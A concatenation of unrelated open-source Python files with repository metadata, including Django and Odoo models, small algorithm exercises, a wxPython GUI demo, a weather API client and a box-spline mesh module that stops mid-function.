ab490c6822ee354cc666f436e00aa5657b6a6e99 | dd0cb8b8e7658ae639961cda37397a1e8ea6f4b1 | /test/test_sim_config.py | 6620e507a846a713407dbb63fc1f877b0f9e1c41 | [] | no_license | jamesprinc3/data-analysis | 271b234375b7943770a45718685a4cb708e278b1 | ba3cb56bd05318921e12c4be9600e6ac069d1f14 | refs/heads/master | 2020-03-07T23:32:17.912776 | 2018-06-25T10:33:45 | 2018-06-25T10:33:45 | 127,784,050 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,371 | py | from unittest import TestCase
from sim_config import SimConfig
class TestGenerateConfigString(TestCase):
def setUp(self):
pass
def test_generate_str(self):
config = {'paths': {'testPath': "test/path"}}
config_str = SimConfig.generate_config_string(config)
assert config_str == "paths {\n\ttestPath = \"test/path\"\n}"
def test_generate_int(self):
config = {'execution': {'numSimulations': 10}}
config_str = SimConfig.generate_config_string(config)
assert config_str == "execution {\n\tnumSimulations = 10\n}"
def test_generate_bool(self):
config = {'execution': {'parallel': True}}
config_str = SimConfig.generate_config_string(config)
assert config_str == "execution {\n\tparallel = true\n}"
def test_generate_two_params(self):
config = {'execution': {'numSimulations': 10, 'parallel': True}}
config_str = SimConfig.generate_config_string(config)
assert config_str == "execution {\n\tnumSimulations = 10,\n\tparallel = true\n}"
def test_generate_two_sections(self):
config = {'execution': {'numSimulations': 10}, 'paths': {'testPath': "test/path"}}
config_str = SimConfig.generate_config_string(config)
assert config_str == "execution {\n\tnumSimulations = 10\n}\n\npaths {\n\ttestPath = \"test/path\"\n}" | [
"[email protected]"
] | |
b9aaf73be86b80c86bd56f0ca20545750714ee9d | 66757f36d5e9482058d4283835ab6534e92b48d8 | /Back/glucose/models.py | 23b1ea45b271f6bea89556f8f5aef2bbc29617b0 | [] | no_license | baldiniyuri/ihealth | 4155a008cb7ce9d3b8ccf5313cde171f45e2ebb8 | dedf421593e503bb80f92bb9b5cff95fbedddb75 | refs/heads/master | 2023-06-21T23:54:50.052907 | 2021-07-22T19:22:02 | 2021-07-22T19:22:02 | 388,496,360 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 240 | py | from django.db import models
from authentication.models import User
class Glucose(models.Model):
user = models.ForeignKey(User, on_delete=models.CASCADE)
glucose = models.IntegerField()
date_time = models.DateTimeField()
| [
"[email protected]"
] | |
2ca84c0f31091c70c2f07ff54c5f0e2242ac4d07 | 6818c057f2f6635979400133ef4557f0feae0f9b | /manage.py | e03ca74e91f9550cb5c9ba5be9848a1e5c47ef8e | [] | no_license | MGoss115/parentingapp | 7094cd4bf7a19099e574dec871d86bffe9b15de2 | 518b12ad9f8f36383a9ce83269211ceb9fc080ff | refs/heads/main | 2023-08-16T20:33:23.311835 | 2021-09-21T15:32:50 | 2021-09-21T15:32:50 | 401,867,458 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 672 | py | #!/usr/bin/env python
"""Django's command-line utility for administrative tasks."""
import os
import sys
def main():
"""Run administrative tasks."""
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'parenting_django.settings')
try:
from django.core.management import execute_from_command_line
except ImportError as exc:
raise ImportError(
"Couldn't import Django. Are you sure it's installed and "
"available on your PYTHONPATH environment variable? Did you "
"forget to activate a virtual environment?"
) from exc
execute_from_command_line(sys.argv)
if __name__ == '__main__':
main()
| [
"[email protected]"
] | |
1729d1308dd79975f42c02fcd155b256d5e09da2 | 9f12202bf41fb4a8fc36871aeae3834c55129bf2 | /Interview Questions/Inorder Traversal of BST.py | c67319e4b4b23c2fa2cc95559dc85d8cadde1d8f | [] | no_license | veetarag/Data-Structures-and-Algorithms-in-Python | b8afebbcfc9146ed06efcf09b58c13c52e76b9ab | 167240935d89df2ec6e2777dc561fabe0244c8a9 | refs/heads/master | 2022-11-15T07:38:31.309514 | 2020-07-04T01:54:30 | 2020-07-04T01:54:30 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 428 | py | # Definition for a binary tree node.
class TreeNode(object):
def __init__(self, x):
self.val = x
self.left = None
self.right = None
class Solution(object):
def inorderTraversal(self, root):
rst = []
def util(root):
if root:
util(root.left)
rst.append(root.val)
util(root.right)
util(root)
return rst
| [
"[email protected]"
] | |
9253df4be11c51d42b256b0cb1030a6890b769a5 | e8bd148169647433cedd8219833271e275044145 | /client.py | 5c0466242b044eb65c826fe436035bad6aafdacc | [] | no_license | marco2013/weather-cn | a752cb880f5d1c12ac11471f8214307b1f03411d | ecb7e8b9900342d89323234a575cf872f6c9ca04 | refs/heads/master | 2020-06-30T00:25:46.968308 | 2017-07-17T16:15:44 | 2017-07-17T16:15:44 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,549 | py | #!/usr/bin/env python
#-*- coding:utf-8 -*-
import requests
import sys
import simplejson as jsmod
def main(args):
# http://119.254.100.75:8080/v1/query
ip = "119.254.100.75"
url = "http://%s:8080/v1/query" % (ip)
ret = requests.post(url, data={
# "cn": "重庆",
"cn": "aaa",
})
obj = jsmod.loads(ret.text, encoding='utf-8')
# read as below
# {
# u'weather1d': u'02\u65e520\u65f6,n01,\u591a\u4e91,13\u2103,\u65e0\u6301\u7eed\u98ce\u5411,\u5fae\u98ce,0|02\u65e523\u65f6,n02,\u9634,12\u2103,\u65e0\u6301\u7eed\u98ce\u5411,\u5fae\u98ce,0|03\u65e502\u65f6,n02,\u9634,11\u2103,\u65e0\u6301\u7eed\u98ce\u5411,\u5fae\u98ce,0|03\u65e505\u65f6,n02,\u9634,11\u2103,\u65e0\u6301\u7eed\u98ce\u5411,\u5fae\u98ce,0|03\u65e508\u65f6,d02,\u9634,11\u2103,\u65e0\u6301\u7eed\u98ce\u5411,\u5fae\u98ce,3|03\u65e511\u65f6,d02,\u9634,12\u2103,\u65e0\u6301\u7eed\u98ce\u5411,\u5fae\u98ce,3|03\u65e514\u65f6,d02,\u9634,13\u2103,\u65e0\u6301\u7eed\u98ce\u5411,\u5fae\u98ce,3|03\u65e517\u65f6,d02,\u9634,13\u2103,\u65e0\u6301\u7eed\u98ce\u5411,\u5fae\u98ce,3|03\u65e520\u65f6,n02,\u9634,13\u2103,\u65e0\u6301\u7eed\u98ce\u5411,\u5fae\u98ce,0',
# u'ret_code': 0
# }
if obj["ret_code"] == 0:
weather1d = obj["weather1d"]
# print weather1d
weather_info = weather1d.split("|")
for hourly_weather in weather_info:
print hourly_weather
else:
err = obj["err"]
print "err when get weather: ", err
if __name__ == "__main__":
main(sys.argv[1:])
| [
"[email protected]"
] | |
7d21bd6490d491584a25d9471d4e8fa2af419c32 | 401bf511c4791f9f582ef51e82ceb63c69d31de6 | /src/revolio/serializable/__init__.py | 9f43814bf7635637096ede509eb80792220560a2 | [] | no_license | BenBlaisdell/revolio | ce312332bc13b97ad87d195045d7e8ea74a3da99 | 93d998f1816dee881e71d576574ff9b3bcd9d90c | refs/heads/master | 2022-12-09T08:11:10.936934 | 2018-04-06T14:44:45 | 2018-04-06T14:44:45 | 86,363,426 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 123 | py | from revolio.serializable import fields
from revolio.serializable.serializable import Serializable, KeyFormat, column_type
| [
"[email protected]"
] | |
723404b6f6ded8abfd07d6f264cc4a03cd885cc2 | 025ed7b41e7bb4204916ed0160bc16935999f94f | /library-backend/book/admin.py | f795aeeeec53ddeec8bc7b5898ad52df53ddd2dc | [] | no_license | luhc228/SmartLibrary | deec554778e27b1ede3ad86be52d1f293331be5e | 075814058a721a51b753216908e13995e3d1e819 | refs/heads/master | 2020-04-30T14:18:47.274452 | 2019-03-21T07:07:19 | 2019-03-21T07:07:19 | 176,887,300 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 174 | py | from django.contrib import admin
from .models import Book, NewBook, RecommendBook
admin.site.register(Book)
admin.site.register(NewBook)
admin.site.register(RecommendBook)
| [
"[email protected]"
] | |
8531ff31b3ebfe39de4f571d391d90a7f0ade912 | 9795dda526b3436de26c73353021a0651a6762f9 | /example/wxpython/图形按钮组件封装测试.py | d53fbaf9305e953572ac050f909f31e672a223de | [
"Apache-2.0"
] | permissive | brucekk4/pyefun | 891fc08897e4662823cf9016a680c07b31a8d5be | 1b4d8e13ee2c59574fded792e3f2a77e0b5e11a2 | refs/heads/master | 2023-07-10T03:54:11.437283 | 2021-08-23T17:46:19 | 2021-08-23T17:46:19 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,178 | py | import pyefun.wxefun as wx
class 窗口1(wx.窗口):
def __init__(self):
self.初始化界面()
def 初始化界面(self):
#########以下是创建的组件代码#########
wx.窗口.__init__(self, None, title='易函数视窗编程系统', size=(600, 369), name='frame', style=wx.窗口边框.普通可调边框& ~(wx.MAXIMIZE_BOX))
self.容器 = wx.容器(self)
self.Centre()
self.窗口1 = self
self.图形按钮1 = wx.图形按钮(self.容器, size=(330, 97), pos=(237, 93), bitmap=None, label='图形按钮')
self.图形按钮1.正常图片 = r'.\resources\hh1.png'
self.图形按钮1.焦点图片 = r'.\resources\hh2.png'
self.图形按钮1.按下图片 = r'.\resources\hh3.png'
self.图形按钮1.禁止图片 = r'.\resources\hh4.png'
self.图形按钮1.显示方式 = r'缩放图片'
self.图形按钮1.图片缩放大小 = (32, 32)
self.图形按钮1.绑定事件(wx.事件.被单击, self.图形按钮1_被单击)
self.按钮1 = wx.按钮(self.容器, size=(161, 44), pos=(35, 197), label='按钮')
self.按钮1.绑定事件(wx.事件.被单击, self.按钮1_被单击)
self.编辑框1 = wx.编辑框(self.容器, size=(149, 43), pos=(26, 21), value='', style=wx.TE_LEFT)
self.超级链接框1 = wx.超级链接框(self.容器, size=(138, 37), pos=(225, 21), label='超级链接框321', url='',style=wx.adv.HL_DEFAULT_STYLE)
self.超级链接框1.链接地址 = r'https://www.baidu.com/'
#########以上是创建的组件代码##########
#########以下是组件绑定的事件代码#########
def 图形按钮1_被单击(self,event):
print("图形按钮1_被单击")
def 按钮1_被单击(self,event):
print("按钮1_被单击")
#########以上是组件绑定的事件代码#########
class 应用(wx.App):
def OnInit(self):
self.窗口1 = 窗口1()
self.窗口1.Show(True)
return True
if __name__ == '__main__':
app = 应用()
app.MainLoop()
| [
"[email protected]"
] | |
c68569999404cf2d9c7dc35dfaf1c7cd5618998e | 79d55c2d9c6fd7fe5a3b6a1b12c4ff5426e6a505 | /venv/Scripts/easy_install-script.py | 300c999a5cbe9930fd0dc10a79ef4c08bae4c46b | [] | no_license | Mbraun5/Pac-Portal | f63a33070d17f0aecab2227789909dc135ca943c | 4dd48d799f3494a3924605c65ce6f458993b77f6 | refs/heads/master | 2020-04-02T01:38:07.100864 | 2018-11-01T00:47:17 | 2018-11-01T00:47:17 | 153,866,921 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 469 | py | #!"C:\Users\Matthew\Desktop\Pycharm Programs\Pacman Portal\venv\Scripts\python.exe"
# EASY-INSTALL-ENTRY-SCRIPT: 'setuptools==39.1.0','console_scripts','easy_install'
__requires__ = 'setuptools==39.1.0'
import re
import sys
from pkg_resources import load_entry_point
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
sys.exit(
load_entry_point('setuptools==39.1.0', 'console_scripts', 'easy_install')()
)
| [
"[email protected]"
] | |
2366c4dccff48536bca68ac6e560f8df0e8a899f | be77678a23b1d44c7bc0ca87be919d84590b19cd | /wymarzony_pies/migrations/0011_auto_20200915_1235.py | 2946a68153c8ac2eba0266a9f8a9665612309cbb | [] | no_license | Arkadiusz0202/Reservation_system_wymarzony_pies | 42d1d7dbf3ae48836473a05957b36424fbed2358 | 21c09b069a2d78073d26316e7978de3a44dca6c5 | refs/heads/master | 2022-12-17T15:17:01.651347 | 2020-09-15T10:50:45 | 2020-09-15T10:50:45 | 294,917,575 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 565 | py | # Generated by Django 3.1.1 on 2020-09-15 10:35
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('wymarzony_pies', '0010_remove_reservation_customer'),
]
operations = [
migrations.AlterField(
model_name='location',
name='open_form',
field=models.CharField(max_length=128),
),
migrations.AlterField(
model_name='location',
name='open_to',
field=models.CharField(max_length=128),
),
]
| [
"[email protected]"
] | |
1e54fceed8c88b5f717dd20801e59eee679cba41 | 7a738f6c8ae8c4004161a4c3f72120594d48cc07 | /backend/projects/models/category.py | 71e6e390344dc23bb2041e0fb39dc3dfbc07c06b | [
"Apache-2.0"
] | permissive | hndoss/manos-bondadosas | 277bcefd1307cfbcd76bfc70cd0846eb83e9a15e | 2d6eaee63ef3d90f26c7f4862b31f6635eb9dee3 | refs/heads/staging | 2020-12-27T18:54:17.372304 | 2020-07-17T02:41:05 | 2020-07-17T02:41:05 | 238,011,718 | 0 | 0 | Apache-2.0 | 2020-07-17T03:05:55 | 2020-02-03T16:37:04 | JavaScript | UTF-8 | Python | false | false | 367 | py | from django.db import models
class Category(models.Model):
category = models.CharField(blank=False, primary_key=True, max_length=30)
description = models.CharField(blank=False, null=True, max_length=60)
def __str__(self):
return self.category
class Meta:
verbose_name = 'Project Category'
verbose_name_plural = 'Categories' | [
"[email protected]"
] | |
2f43c32851336a99b0f4e75ce5945c65d261ebec | 9bb4f38b400540dee75294a1f48bcb1128f5ecaf | /db/peewee/Students.py | ac9c53de4f43c3b8c509fa7209d063eb55669735 | [] | no_license | andresmontoyab/Python | 43184a01f4e168918ee0499cfc4e989a318de3f5 | 713840ba1bbd64eb8d5549c03c2c7f7e18261017 | refs/heads/main | 2023-05-12T10:28:50.273930 | 2021-05-29T00:20:22 | 2021-05-29T00:20:22 | 333,450,765 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,223 | py | from peewee import *
db = SqliteDatabase('students.db')
#In order to map object to models we must create a class that extends from peewee Model
class Student(Model):
username = CharField(max_length=255, unique=True)
points = IntegerField(default=0)
class Meta:
#This meta class help peewee to undersntand to which db belongs this Model
database = db
students = [
{
'username': 'Andres',
'points': 7
},
{
'username': 'Juan',
'points': 9
},
{
'username': 'Gelen',
'points': 10
},
{
'username': 'Mari',
'points': 10
}
]
def add_students():
for student in students:
try:
Student.create(username=student['username'],
points=student['points'])
except IntegrityError:
print("Student with username {} was already created".format(student['username']))
def top_student():
top_student = Student.select().order_by(Student.points.desc()).get()
return top_student
if __name__ == '__main__':
db.connection()
db.create_tables([Student], safe=True)
add_students()
#top_student()
print(top_student().username) | [
"[email protected]"
] | |
ac7938005be2abd036a827eb5074e581c46cf254 | 13b1ece281a1eaa0cac2706c14f1d4c190f73c2b | /Assignment 3/flood_fill_solutions/BMC201955/BMC201955.py | 149f4a1fda7450ab05aa6732a5ca52691108105c | [] | no_license | bhi5hmaraj/APRG-2020 | 0c995f79cc50108956d1bd0ceed8d7cb6d96f34e | 7e11c14a02d48d52b547696fc930f38c586ce0da | refs/heads/master | 2022-07-17T09:41:58.947321 | 2020-05-21T12:34:46 | 2020-05-21T12:34:46 | 236,176,133 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,177 | py | import sys
lst = list(map(int,input().split(" ")))
lst1 = list(map(int,input().split(" ")))
(m,n) = (lst[0],lst[1])
(p,q) = (lst1[0],lst1[1])
matrix = []
for i in range(n):
matrix.append(list(map(int,input().split(" "))))
lsst = [[0]*m]*m
for i in range(n):
a = matrix[i][0]
b = matrix[i][1]
lsst[a-1][b-1] = 2
lsst[p-1][q-1] = 1
def func(lsst1):
m1 = len(lsst1)
for i in range(m1):
for j in range(m1):
if lsst1[i][j] == 1:
if ((i-1) in range(m1)) and (lsst1[(i-1)][j] == 0):
lsst1[(i-1)][j] = 1
elif ((i+1) in range(m1)) and (lsst1[(i+1)][j] == 0):
lsst1[(i+1)][j] = 1
elif ((j-1) in range(m1)) and (lsst1[i][(j-1)] == 0):
lsst1[i][(j-1)] = 1
elif ((j+1) in range(m1)) and (lsst1[i][(j+1)] == 0):
lsst1[i][(j+1)] = 1
return(lsst1)
for i in range(m):
for j in range(m):
if lsst[i][j] == 0:
lsst = func(lsst)
t = "Y"
for i in range(m):
for j in range(m):
if lsst[i][j] == 0:
t = "N"
break
sys.stdout.write(t)
| [
"[email protected]"
] | |
e6e263c361724887317befacbe85f8dd61830b20 | 30200bf7122c0bb2777db5df451174378493e984 | /tools/run-after-git-clone | 3afe5cf77802ddbeb695af2a5a6afb5c40ddcaae | [
"LicenseRef-scancode-unknown-license-reference",
"Apache-2.0"
] | permissive | rjanser/fastai_pytorch | 7310320d6ef24a47fb9035bf8584b23511eb0261 | ffef0b405292d0a5dc14bf1c0c21d3763f2b4646 | refs/heads/master | 2020-03-30T06:42:22.102529 | 2018-09-29T14:33:08 | 2018-09-29T14:33:08 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,000 | #!/usr/bin/env python
# if you're a fastai developer please make sure you do this:
#
# git clone https://github.com/fastai/fastai_pytorch
# cd fastai_pytorch
# tools/run-after-git-clone
#
import subprocess, os
from pathlib import Path
def run_script(script):
cmd = f"python {script}"
#print(f"Executing: {cmd}")
result = subprocess.run(cmd.split(), shell=False, check=False,
stdout=subprocess.PIPE, stderr=subprocess.PIPE)
if result.returncode != 0: print(f"Failed to execute: {cmd}")
if result.stdout: print(f"{result.stdout.decode('utf-8')}")
if result.stderr: print(f"Error: {result.stderr.decode('utf-8')}")
# make sure we are under the root of the project
cur_dir = Path(".").resolve().name
if (cur_dir == "tools"): os.chdir("..")
path = Path("tools")
# facilitate trusting of the repo-wide .gitconfig
run_script(path/"trust-origin-git-config")
# facilitate trusting notebooks under docs_src
run_script(path/"trust-doc-nbs")
| [
"[email protected]"
] | ||
fdaf8ca8fbc75704adf287f7fed5dfe185c3a435 | 434a2de27730f42a4d632e9c810324e35f893cd4 | /model/base.py | 81b36e5a062720d3ecd01cf234b284f70226352b | [] | no_license | AcademiaSinicaNLPLab/LJ2M | f49ebd55dc777271727a61faecb13c80a5c65c9c | a1dae7e2bb7de03322c5faeabfa8c15d4d476c5b | refs/heads/master | 2020-08-08T20:08:15.493660 | 2015-09-05T02:59:43 | 2015-09-05T02:59:43 | 34,600,097 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 621 | py | import abc
class LearnerBase:
__metaclass__ = abc.ABCMeta
#def __init__(self):
# raise NotImplementedError("This is an abstract class.")
@abc.abstractmethod
def set(self, X, y, feature_name):
"""
set the training X, y, and feature name string
"""
pass
@abc.abstractmethod
def train(self, **kwargs):
pass
@abc.abstractmethod
def predict(self, X_test, y_test, **kwargs):
pass
@abc.abstractmethod
def dump_model(self, file_name):
pass
@abc.abstractmethod
def load_model(self, file_name):
pass
| [
"[email protected]"
] | |
0750700020ee9d97d76ac24dad19ec69e89de280 | ebd3ade52cc1122830e2bc07700b83ff0339c7cf | /ufc_live/account_extend/models/models.py | 0748eb41fbf98211927b3f15ef9ee53500769d00 | [] | no_license | Guobower/odoo-project-data | 8596031646d8ba6ed301f7d745f9125bb4d7d99f | 1f6ce801b4113aad18b3ea9a380b5ad257bdbe34 | refs/heads/master | 2020-04-07T07:41:02.796468 | 2017-12-27T17:39:40 | 2017-12-27T17:39:40 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,759 | py | from odoo import models, fields, api
class account_extend(models.Model):
_inherit = 'account.invoice'
bill_no = fields.Char(string="Bill No")
frm_bill_no = fields.Char(string="From Bill No")
province = fields.Char(string="Province")
branch = fields.Many2one('branch',string="Branch")
bill_num = fields.Char(string="To Bill No")
m_tons = fields.Float(string="M Tons")
# summary_id = fields.Many2one('summary.ffc')
# ==================punching branch in account.move on validate button using fun super========
# ==================punching branch in account.move on validate button using fun super========
@api.multi
def action_invoice_open(self):
new_record = super(account_extend, self).action_invoice_open()
JournalEntry = self.env['account.move'].search([('name','=',self.number)])
if self.branch:
JournalEntry.branch = self.branch.id
return new_record
class move_extend(models.Model):
_inherit = 'account.move'
branch = fields.Many2one('branch',string="Branch")
ufc_id = fields.Many2one('ufc.auto')
class journal_extend(models.Model):
_inherit = 'account.journal'
branch = fields.Many2one('branch',string="Branch")
class bank_extend(models.Model):
_inherit = 'account.bank.statement'
branch = fields.Many2one('branch',string="Branch")
# ===================showing branch of relevant journal in cash book==========================
# ===================showing branch of relevant journal in cash book==========================
@api.onchange('journal_id')
def get_branch(self):
records = self.env['account.journal'].search([('id','=',self.journal_id.id)])
self.branch = records.branch.id
class bank_extend(models.Model):
_inherit = 'account.bank.statement.line'
branch = fields.Many2one('branch',string="Branch")
# =========================punching branch in journal enteries using fun super===============
# =========================punching branch in journal enteries using fun super===============
@api.multi
def process_reconciliation(self,data,uid,id):
new_record = super(bank_extend, self).process_reconciliation(data,uid,id)
records = self.env['account.bank.statement'].search([('id','=',self.statement_id.id)])
journal_entery = self.env['account.move'].search([], order='id desc', limit=1)
journal_entery.branch = records.branch.id
return new_record
class ufc_user_extend(models.Model):
_inherit = 'res.users'
Branch = fields.Many2one ('branch',string="Branch")
class branch(models.Model):
_name = 'branch'
Address = fields.Char(string="Address")
name = fields.Char(string="Name")
Phone = fields.Char(string="Phone")
Mobile = fields.Char(string="Mobile")
ptcl = fields.Char("Ptcl")
| [
"[email protected]"
] | |
ca941ddddb7fc347c0a254966760fb0239e0ba73 | 96ea8a4b241794f0eab2e34cbd75124dac26f2ac | /users/migrations/0002_auto_20200628_1146.py | 76855fd7b14a9ccf3149ea2cd030b856d34bdfce | [] | no_license | magloirend/budget_tracker | a1cd53aa9ad2a99e1fd1b8ee445bce2f98136806 | 4a66bc3d516f8116c20aa11399f25e618e74f06e | refs/heads/master | 2022-11-18T04:02:58.427416 | 2020-07-13T13:03:38 | 2020-07-13T13:03:38 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 677 | py | # Generated by Django 3.0.7 on 2020-06-28 11:46
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('users', '0001_initial'),
]
operations = [
migrations.AddField(
model_name='user',
name='organization_owner',
field=models.BooleanField(default=False),
),
migrations.AlterField(
model_name='user',
name='organization',
field=models.ForeignKey(default=1, on_delete=django.db.models.deletion.CASCADE, to='users.Organization'),
preserve_default=False,
),
]
| [
"[email protected]"
] | |
502b63b465725af09cddcbad8d731b28c955743a | c31931fa13cb469b7cc10df3bb87dc308d241fa1 | /game/core/systems/dialogue/__init__.py | 4c39a8a5317135ee08de407920c0e44ea555de4e | [] | no_license | darrickyee/ue-pygame | 53158a98df1dddbd2efdd0132c82eff523b54413 | 9be0a519aa8de455fdb54bddad7e5f773fe86d75 | refs/heads/master | 2021-02-09T01:24:15.015941 | 2020-12-03T03:50:32 | 2020-12-03T03:50:32 | 244,221,961 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 79 | py | from .system import DialogueSystem
from .loader import loadNodes, loadDlgGraph
| [
"[email protected]"
] | |
071e915b9f4f0fb968ac51115b47470507899e6e | 89a3cb6e0625e7ae8d3d4c12bf5214557d344059 | /Report_[2017-05-13]_Box_Spline_Initial_Analysis/box_mesh[6-8-2017 max-side-len verbose].py | 91afd0bec85321cdbf04efb580f2f16d4754acf1 | [] | no_license | tchlux/VarSys | e5adc802bbf8149bd3584d350bb429c24d4cbdd8 | 313a3029d838520d30ce960fa56a897ba9180037 | refs/heads/master | 2023-07-20T10:58:34.901566 | 2020-09-22T15:37:45 | 2020-09-22T15:37:45 | 108,617,499 | 0 | 0 | null | 2023-07-06T21:13:39 | 2017-10-28T03:44:31 | null | UTF-8 | Python | false | false | 23,062 | py | # WARNING: This 'max-side-len' box mesh construction code cannot
# handle data with shared x or y coordinates (allowing for
# more than 2*dimension neighbors)
# WARNING: This 'max-side-len' box mesh construction code does not
# properly expand into higher dimension than x \in
# R^2. During the 'growing' phase, all dimensions need to be
# checked for expansion, not just the current study.
import numpy as np
from plotly_interface import *
import os
# Pre: "x" is a 1 x N dimensional numpy array or list in the range [0,1]
# Post: The value of the quadratic box spline in N dimensions
# is computed for the given point.
def linear(x):
x *= 2
# Compute the box spline function value for the x-coordinate based
# on which region of the box that it is in
func_val = 1.0
for d in range(len(x)):
if (0 <= x[d] < 1):
func_val *= x[d]
elif (1 <= x[d] < 2):
func_val *= (2 - x[d])
return func_val
# Pre: "x" is a 1 x N dimensional numpy array or list in the range [0,1]
# Post: The value of the quadratic box spline in N dimensions
# is computed for the given point.
def quadratic(x):
x *= 3
# Compute the box spline function value for the x-coordinate based
# on which region of the box that it is in
func_val = 1 / 2**(x.shape[0])
for d in range(len(x)):
if (0 <= x[d] < 1):
func_val *= x[d]**2
elif (1 <= x[d] < 2):
func_val *= -(2*x[d]**2 - 6*x[d] + 3)
elif (2 <= x[d] <= 3):
func_val *= (x[d] - 3)**2
return func_val
# Pre: "x" is a 1 x N dimensional numpy array or list in the range [0,1]
# Post: The value of the classic cubic box spline in N dimensions
# is computed for the given point.
def cubic(x):
x *= 4
# Compute the box spline function value for the x-coordinate based
# on which region of the box that it is in
func_val = 1 / (2*3**(x.shape[0]))
for d in range(len(x)):
if (0 <= x[d] < 1):
func_val *= (x[d]**3)
elif (1 <= x[d] < 2):
func_val *= (4 - 12*x[d] + 12*x[d]**2 - 3*x[d]**3)
elif (2 <= x[d] < 3):
func_val *= (-44 + 60*x[d] - 24*x[d]**2 + 3*x[d]**3)
elif (3 <= x[d] <= 4):
func_val *= (4-x[d])**3
return func_val
# Pre: "x" is a 1 x N dimensional numpy array or list
# "center" is a 1 x N dimensional numpy array or list
# representing the bottom left (in cartesian coordinates) of the box
# "[.*]_width" is the set of widths of this box spline in the
# less than center and greater than center directions
# "func" is the box function to use assuming we have x scaled
# into the unit cube
# Post: The value of the classic quadratic box spline in N dimensions
# is computed for the given point.
def compute_box(x, center=None, low_width=None, upp_width=None, func=linear):
# Initialize center and width of box 3
if type(center) == type(None):
center = np.ones(x.shape)/2
if type(low_width) == type(None):
low_width = np.ones(x.shape)/2
if type(upp_width) == type(None):
upp_width = np.ones(x.shape)/2
# Make sure we don't modify the input x value when evaluating
x = x.copy()
# Scale the point to be in the space where the box is the unit cube
x -= center
x = np.where(x < 0, (1 - x / low_width)/2, (1 + x / upp_width)/2)
# If the point is outside of the box, return 0
if (min(x) <= 0) or (max(x) >= 1): return 0
# Return the final function value at that point
return func(x)
# Function for storing a center and width associated with a quadratic
# box spline as well as evaluating the box spline
class Box:
box_count = -1 # Used for generating ID numbers
# Organize the necessary values for the box
def __init__(self, center, low_width=None, upp_width=None,
func=linear, width_scalar=1.0):
# Initialize lower and upper widths if they are not given
if type(low_width) == type(None):
low_width = np.ones(center.shape) * float('inf')
if type(upp_width) == type(None):
upp_width = np.ones(center.shape) * float('inf')
# Get an id for this box
self.id = Box.box_count = Box.box_count + 1
self.box_func = func
self.width_scalar = width_scalar
self.center = center
self.low_width = low_width
self.upp_width = upp_width
# Returns true if this box contains "pt"
def contains(self, pt):
return (np.all(self.center-self.low_width < pt) and
np.all(self.center+self.upp_width > pt))
# String representation of this box
def __str__(self):
string = "ID: %s\n"%self.id
string += " center: %s\n"%self.center
string += " lower: %s\n"%(self.center - self.low_width)
string += " upper: %s\n"%(self.center + self.upp_width)
return string
# Evaluates the underlying box function for this box at a given point
def __call__(self, x):
# Return the computed quadratic box spline evaluation
return compute_box(x, self.center, self.low_width*self.width_scalar,
self.upp_width*self.width_scalar, self.box_func)
# Function for creating a surface over a region defined by the
# axis-aligned bounding box of all data points
class BoxMesh:
def __init__(self, box_func=quadratic, width_scalar=1.0):
self.boxes = []
self.values = []
self.box_func = box_func
self.width_scalar = width_scalar
# Given a set of control points, this constructs the maximum box
# mesh, that is to say the boxes around each control point have
# the largest minimum side length possible.
# Without computing max-side-length boxes: O(n^2*log(n) * d )
# With computing max-side-length boxes: O(n^3 * d^2)
def add_points(self, control_points, max_side_length_box=False):
self.values = control_points[:,-1]
control_points = control_points[:,:-1]
# Cycle through the box centers and construct the max-boxes
for i,(center,value) in enumerate(zip(control_points,values)):
box = Box(center, func=self.box_func, width_scalar=self.width_scalar)
# Holder for candidate boundary points for this box
candidates = list(range(len(control_points)))
candidates.pop(i)
candidates.sort(key = lambda c: np.max(abs(center - control_points[c])))
# Holder for the neighbors of this box (on its edge)
neighbors = []
# Cycle through and shrink the box, touching immediate neighbors
for c in candidates:
if not box.contains(control_points[c]): continue
other_pt = control_points[c]
# handle choosing a split dimension normally
split_dim = np.argmax(abs(center - other_pt))
# Shrink 'box' along that best dimension
width = center[split_dim] - other_pt[split_dim]
if width < 0:
box.upp_width[split_dim] = min(box.upp_width[split_dim],-width)
else:
box.low_width[split_dim] = min(box.low_width[split_dim], width)
# Update the neighbors for the new box
neighbors.append( [split_dim,c] )
# Skip the rest of the computations if we don't need max boxes
if not max_box:
self.boxes.append(box)
continue
# Constructing the Box with Largest Minimum Side Length
#===============================================================
print()
print()
print("========================================")
print()
print(box)
# Temporary variable names
dim = control_points.shape[1]
num_pts = control_points.shape[0]
min_bounds = np.min(control_points, axis=0)
max_bounds = np.max(control_points, axis=0)
# Try and find a larger minimum side length, once no
# improvement can be made, we must have the max-box
for _ in range(num_pts):
# Adjust the side lengths, ignoring infinities
low_width = np.where(box.low_width < float('inf'),
box.low_width, box.center - min_bounds)
upp_width = np.where(box.upp_width < float('inf'),
box.upp_width, max_bounds - box.center)
side_lengths = low_width + upp_width
# Get the smallest side and its length
min_side = np.argmin(side_lengths)
min_len = np.min(side_lengths)
# Get the current neighbors on this minimum side
to_use = [n for n in neighbors if n[0] == min_side]
print("--------------------------")
print()
print("neighbors: ",neighbors)
print("low_width: ",low_width)
print("upp_width: ",upp_width)
print("min_side: ",min_side)
print("min_len: ",min_len)
print("to_use: ",to_use)
# Cycle through all dimensions to shorten on
for d in range(dim):
# Don't try and shorten the min side
if d == min_side: continue
